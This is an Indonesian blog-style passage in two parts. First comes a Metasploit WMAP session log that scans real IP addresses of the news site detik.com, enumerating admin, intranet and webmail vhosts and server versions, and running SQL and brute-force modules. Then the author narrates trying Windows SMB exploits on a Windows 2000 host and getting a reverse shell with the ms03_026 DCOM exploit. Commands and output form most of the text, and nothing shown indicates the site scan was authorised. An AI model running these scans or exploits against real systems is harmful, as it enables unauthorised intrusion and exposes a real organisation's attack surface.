2008

| | | | 12 | | | | +------081221483.png | image | +------iring808.gif | +------icn_jwb.gif | +------arrow_up.gif | +------ticketboxlogo.gif | +------logodetikcomfooter.gif | +------pollwpdetik.gif | +------spacer.gif | +------iconvideo.gif | +------logodetikcom.gif | +------Logo_25wht.gif | +------song_icon.gif | +------arrow_down.gif | +------tvwp.swf | +------iconphoto.gif | +------rssfeed_s.gif | +------panahforumwp.gif | +------bgregional6a.gif | +------bgticketbox.gif | +------bgdetikmap.gif | +------bgtapoff6a.gif | +------radioplayer.gif | +------bgpollsmsorange.gif | +------bgtapon6a.gif | +------pollingsmscenter.jpg | +------rss.gif | +------tanyasajalogo.gif | +------bgmenuatas.gif | +------tanya.gif | +------detikpublishinglogo.gif | +------bgmaplokasi.gif | +------bgcontent.gif [*] Done. msf > wmap_targets -s 4 msf > wmap_website [*] Website structure [*] 202.158.66.20:80 SSL:0 ROOT_TREE | content_image | | 2008 | | | 12 | | | | 20 | | | | | 283 | | | | | +------20081220-andini-k.jpg | | | | | 471 | | | | | +------wanita-k.jpg [*] Done. msf > wmap_targets -s 5 msf > wmap_website [*] Website structure [*] 202.158.66.190:80 SSL:0 ROOT_TREE | images | | content | | | 2008 | | | | 12 | | | | | 18 | | | | | | 238 | | | | | | +------bantuan-luar.jpg

[*] Done. msf > wmap_targets -s 6 msf > wmap_website [*] Website structure [*] 202.158.66.54:80 SSL:0 ROOT_TREE | images | | wp | | +------Telkomsel-200x300.swf | | +------alexa_200x300b.gif | | +------BannerFLEXISPEEDY_300x250-01.swf | | +------wp-detik-magicaccess2.swf | | +------wp1-XLSolution-338x200.swf | | +------StarTV-19-338x133.swf | | +------StarTV-19-338x30.swf | | +------BannerBudpar875x100-01.swf | | +------Banner_Detik_Agustus_08.jpg [*] Done. msf > wmap_targets -s 7 msf > wmap_website [*] Website structure [*] 202.158.66.24:80 SSL:0 ROOT_TREE | static | | detikcom1 | | +------toppariwaradetikcom.php [*] Done. msf [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] msf msf [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] > wmap_run -t Loaded auxiliary/scanner/http/version ... Loaded auxiliary/scanner/http/wmap_ssl_vhost ... Loaded auxiliary/scanner/http/wmap_vhost_scanner ... Loaded auxiliary/scanner/http/frontpage_login ... Loaded auxiliary/scanner/http/frontpage ... Loaded auxiliary/scanner/http/wmap_file_same_name_dir ... Loaded auxiliary/scanner/http/wmap_dir_scanner ... Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ... Loaded auxiliary/scanner/http/wmap_backup_file ... Loaded auxiliary/scanner/http/wmap_dir_listing ... Loaded auxiliary/scanner/http/wmap_replace_ext ... Loaded auxiliary/scanner/http/writable ... Loaded auxiliary/scanner/http/wmap_files_dir ... Loaded auxiliary/scanner/http/wmap_brute_dirs ... Loaded auxiliary/scanner/http/wmap_blind_sql_query ... Analysis completed in 1.00374484062195 seconds. Done. > wmap_targets -s 3 > wmap_targets -p Id. Host 1. 202.158.66.94 2. 202.158.66.164 => 3. 202.158.66.86 4. 202.158.66.20 5. 202.158.66.190 6. 202.158.66.54 7. 202.158.66.24 8. 64.233.183.127 Done.

Port

SSL 80 80 80 80 80 80 80 80

msf > setg VHOST www.detik.com

VHOST => www.detik.com msf > setg DOMAIN detik.com DOMAIN => detik.com msf > setg EXT .php EXT => .php msf > wmap_run -e [*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 202.158.66.86:80 [*] Sending request with random domain LtELt.detik.com [*] Vhost found admin.detik.com [*] Vhost found services.detik.com [*] Vhost found webmail.detik.com [*] Vhost found console.detik.com [*] Vhost found apps.detik.com [*] Vhost found mail.detik.com [*] Vhost found intranet.detik.com [*] Vhost found intra.detik.com [*] Vhost found corporate.detik.com [*] Vhost found www.detik.com [*] Vhost found web.detik.com [*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 202.158.66.86:80 [*] http://202.158.66.86:80/ may not support FrontPage Server Extensions [*] Launching auxiliary/scanner/http/version WMAP_SERVER against 202.158.66.86:80 [*] 202.158.66.86 is running Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 ) [*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 202.158.66.86:80 [*] http://202.158.66.86:80 is running Apache/2.2.4 (Unix) DAV/2 PHP/5.1.6 [*] FrontPage not found on http://202.158.66.86:80 [404 Not Found] [*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 202.158.66.86:80 [*] Error: 202.158.66.86 unknown protocol [*] Launching auxiliary/scanner/http/wmap_brute_dirs WMAP_DIR / against 202.158.66.86:80... [*] Running.. [*] NOT Found http://202.158.66.86:/Aaa/ 404 [*] NOT Found http://202.158.66.86:/Aab/ 404 [*] NOT Found http://202.158.66.86:/Aac/ 404 ... ... ... msf > wmap_reports -p [*] Id. Created Target (host,port,ssl) 19. Mon Dec 22 00:29:25 +0300 2008 202.158.66.86,,0 18. Mon Dec 22 00:29:19 +0300 2008 202.158.66.86,80,0 4. Mon Dec 22 00:22:31 +0300 2008 202.158.66.86,80,0 1. Mon Dec 22 00:00:21 +0300 2008 64.233.183.127,80,0 [*] Done. msf > wmap_reports -s 19 WMAP REPORT: 202.158.66.86,,0 Metasploit WMAP Report [Mon Dec 22 00:29:25 +0300 2008] VHOST NAME: admin.detik.com Vhost admin.detik.com found. [Mon Dec 22 00:29:25 +0300 2008]

VHOST NAME: services.detik.com Vhost services.detik.com found. [Mon Dec 22 00:29:27 +0300 2008] VHOST NAME: webmail.detik.com Vhost webmail.detik.com found. [Mon Dec 22 00:29:31 +0300 2008] VHOST NAME: console.detik.com Vhost console.detik.com found. [Mon Dec 22 00:29:32 +0300 2008] VHOST NAME: apps.detik.com Vhost apps.detik.com found. [Mon Dec 22 00:29:34 +0300 2008] VHOST NAME: mail.detik.com Vhost mail.detik.com found. [Mon Dec 22 00:29:38 +0300 2008] VHOST NAME: intranet.detik.com Vhost intranet.detik.com found. [Mon Dec 22 00:29:39 +0300 2008] VHOST NAME: intra.detik.com Vhost intra.detik.com found. [Mon Dec 22 00:29:41 +0300 2008] VHOST NAME: corporate.detik.com Vhost corporate.detik.com found. [Mon Dec 22 00:29:42 +0300 2008] VHOST NAME: www.detik.com Vhost www.detik.com found. [Mon Dec 22 00:29:45 +0300 2008] VHOST NAME: web.detik.com Vhost web.detik.com found. [Mon Dec 22 00:29:46 +0300 2008] [*] Done. msf > wmap_reports -s 18 WMAP REPORT: 202.158.66.86,80,0 Metasploit WMAP Report [Mon Dec 22 00:29:19 +0300 2008] WEB_SERVER TYPE: Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 ) [Mon Dec 22 00:29:57 +0300 2008] [*] Done.

Itulah beberapa contoh penggunaan WMAP metasploit. Dan seperti biasa, metasploit bukanlah tools ajaib yang dengan konfigurasi standard (baca: donlot langsung pakai) dapat memuaskan para kiddies. Metasploit Framework adalah suatu framework yang memberikan lingkungan luar biasa bagi mereka-mereka yang dapat memanfaatkannya dengan sangat baik. Jangan heran jika banyak yang memiliki plugin-plugin ataupun exploit-exploit pribadi dengan metasploit framework mereka sendiri tanpa mem-publishnya kepada umum. WMAP saat ini merupakan project awal metasploit untuk penetrasi aplikasi web, dengan sifatnya yang opensource maka dalam beberapa waktu dapat kita ramalkan banyak modul-modul yang akan ditambahkan. Untuk kalian yang hobi bermain-main dengan aplikasi web dan mencari tools yang dapat membantu proses tersebut secara otomatis serta dapat dikustomisasi maka WMAP metasploit adalah salah satu pilihan yang baik. PS: ada yang memperhatikan bahwa detik.com memiliki struktur yang cukup unik dan menarik?

Lagi Jajal Metasploit FrameworkDah lama gw punya Metasploit, cuma masih bingung ini gunanya bwt apa, toh lom perna coba sama skali. Dari Cerita2 kalo Metasploit tuh gunanya byk, salah satu-nya untuk masuk ke dalam system komputer orang alias hack. Dah mulai deh gw Install dulu Metasploit Framework (Gw pake yg versi terbaru 3.1) Target pertama gw bwt jajal pake win 2000 aja bwt asal bisa masuk Mulai deh gw jalanin Metasploit 3 GUI Dan gw mulai pencarian exploit yg cocok bwt win 2000. Di situ dapet banyak, saking banyak nya gw sampe bingung yg mana yg bisa bwt gw pake untuk masuk ke dalam windows target gw. Akhirnya daripada bingung gw coba maen cleck-click tanpa baca2 terlebih dahulu. dah hasil nya: 04:05:34 - Initialized the Metasploit Framework GUI. 04:05:18 - ms04_031_netdde [*] Launching exploit windows/smb/ms04_031_netdde 04:05:19 - ms04_031_netdde [*] Started bind handler 04:05:20 - ms04_031_netdde [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal) 04:05:39 - ms04_031_netdde [*] Launching exploit windows/smb/ms04_031_netdde 04:05:40 - ms04_031_netdde [*] Started bind handler 04:05:51 - ms04_031_netdde [-] Exploit failed: The connection timed out (192.168.30.217:445). (Gagal lagi) 04:05:29 - msdns_zonename [*] Launching exploit windows/smb/msdns_zonename 04:05:30 - msdns_zonename [*] Started bind handler 04:05:31 - msdns_zonename [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal Lagi..) 04:05:56 - ms06_025_rras [*] Launching exploit windows/smb/ms06_025_rras 04:05:57 - ms06_025_rras [*] Started bind handler 04:05:58 - ms06_025_rras [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal mulu..) 04:05:41 - ms04_011_lsass [*] Launching exploit windows/smb/ms04_011_lsass 04:05:42 - ms04_011_lsass [*] Started reverse handler 04:05:43 - ms04_011_lsass [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Gagal lagi dah mulai bt..) 04:05:59 - ms04_007_killbill [*] Launching exploit windows/smb/ms04_007_killbill 04:05:00 - ms04_007_killbill [*] Started reverse handler 04:05:01 - ms04_007_killbill [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445). (Akhirnya Gagal lagi ) - Ampun dah gak ada yg bisa masuk, cupu bgt dah gw - Mulai Lirik-lirik jam, udah jam 4 pagi liwat - Coba lagi cari referensi tutorial di google - Dapet, tapi dsitu pakenya Metasploit 2.7 ** Untung perna download jg yg versi lama nya - Lansung aja ga pake lama Gw Uninstall yg v3.1 & install lagi yg v2.7 - Gw jalan lewat console MSFConsole, seperti di bawah ini: + =[ msfconsole v2.7 [157 exploits - 76 payloads] msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.20.217 RHOST -> 192.168.20.217 msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.20.7

LHOST -> 192.168.20.7 msf msrpc_dcom_ms03_026(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Sending request [*] Got connection from 192.168.20.7:4321 192.168.20.217:1028 Microsoft Windows 2000 [Version 5.00.2195] Akhirnya bisa jg masuk ke windows 2000.. Padahal kalo mo make KaHT malah lebih gampang bwat masuk ke win 2000, tp kalo ke xp ga bisa. Dah ahh, skrng dah jam 5.45 waktu kelapa Gading, sekarang jam nya tidur, bsok pagi hrus kerja lg .. Bu byee cmiiw